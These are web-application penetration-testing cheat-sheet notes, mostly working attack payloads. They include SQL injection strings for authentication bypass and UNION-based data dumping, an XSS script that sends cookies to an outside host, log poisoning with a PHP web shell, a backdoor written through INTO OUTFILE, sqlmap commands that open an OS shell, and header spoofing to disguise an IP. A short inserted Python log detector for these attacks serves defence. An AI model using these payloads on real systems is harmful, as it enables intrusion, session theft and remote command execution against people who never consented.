General
Try reading the php source code of the web application:
http://<ip>/script.php/?-s
Do you see any LFI/RFI vulnerability posted by Nikto? Try
fimap -u <ip-address>
Check for Input Validation in forms:
1' or 1=1 limit 1;# AND 1' or 1=1--)
Stealing Cookies
<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>
<script> new Image().src="http://10.11.0.5/bogus.php?output="+document.cookie; </script>
File Inclusion Vulnerabilities
php.ini values:
register_globals, allow_url, allow_url_fopen, allow_url_include
Terminate our request with a null byte (possible in php below 5.3)
For LFI/RFI attacks, this might be useful:
https://github.com/lightos/Panoptic/
Contaminating Log Files
Contaminate the log file so that it contains PHP code which can later be used in an LFI attack:
nc -nv 192.168.30.35 80 <?php echo shell_exec($_GET['cmd']);?>
So cmd= is introduced into the php execution, and now by including the logfile you can execute any command.
SQL Injection
Classic Authentication Bypass
select * from users where name ='any' or 1=1;#'
select * from users where name ='any' or 1=1 limit 1;#'
Error Based Enum
order by
union all operator → allows us to add our own select queries to the original, but the new select needs to have the same number of columns as the original select statement
union all select 1,2,3,4,5,6
union all select 1,2,3,4,@@version,6
union all select 1,2,3,4,user(),6
union all select 1,2,3,4,table_name,6 FROM information_schema.tables
union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
union select 1,2,name,4,password,6 FROM users
OR
http://10.11.1.35/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users
Blind SQL Injection
and 1=1;# and 1=2;#
If they have different results, it is an indication of a possible injection location.
Use time as a test parameter for the query:
sleep(5)
select IF(MID(@@version,1,1) = '5', SLEEP(5), 0);
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
http://10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
SQLMap
sqlmap -u http://192.168.30.35 --crawl=1
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --dump --threads=5
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --os-shell
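Added example (not part of the original notes): a small detector that parses Apache combined-format access log lines and flags the three techniques from the sections above (UNION/load_file/outfile SQLi, LFI with traversal or a null byte, and PHP code planted in request fields for log poisoning). The log lines, paths and IPs are constructed samples, and the rule patterns are my own assumptions, not a complete signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" format (not real traffic).
# Line 2: UNION-based SQLi; line 3: LFI with traversal + null byte;
# line 4: PHP code planted in the User-Agent (log poisoning);
# line 5: the poisoned log pulled back in via LFI with cmd=.
SAMPLE_LOG = """\
10.11.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /comment.php?id=738 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /comment.php?id=738%20union%20all%20select%201,2,3,4,@@version,6 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.11.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.11.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET / HTTP/1.1" 400 0 "-" "<?php echo shell_exec($_GET['cmd']);?>"
10.11.0.5 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule: (pattern, fields it is checked against). Patterns are assumptions, not a full ruleset.
RULES = {
    "sqli": (re.compile(
        r"\bunion\s+(?:all\s+)?select\b|@@version|\bload_file\s*\(|\binto\s+outfile\b"
        r"|information_schema|\bsleep\s*\(", re.I), ("path",)),
    "lfi": (re.compile(r"\.\./|\x00|/etc/passwd|/var/log/|\.log\b", re.I), ("path",)),
    "log_poison": (re.compile(r"<\?php|\$_(?:GET|POST|REQUEST)\[", re.I), ("path", "ua", "referer")),
}

def classify(line):
    """Parse one log line; return a dict with the matched rule names, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["path"] = unquote_plus(fields["path"])  # decode %20, %00 etc. before matching
    hits = sorted(name for name, (rx, where) in RULES.items()
                  if any(rx.search(fields[f]) for f in where))
    return {"ip": fields["ip"], "ts": fields["ts"], "path": fields["path"], "hits": hits}

def scan(log_text):
    """Return only the parsed lines that triggered at least one rule."""
    results = (classify(line) for line in log_text.splitlines())
    return [r for r in results if r and r["hits"]]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ts"], r["ip"], r["hits"], r["path"])
```

Note that the poisoned User-Agent on line 4 produced a 400 response yet still landed in the log, which is exactly why the later LFI on line 5 is the line to alert on.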
Modify HTTP Headers
Install addon “Modify Headers”
In some cases, to look like you have a different IP, you can change the value of the X-Forwarded-For header
https://docs.alertlogic.com/userGuides/web-security-manager-premier-preserve-IP-address.htm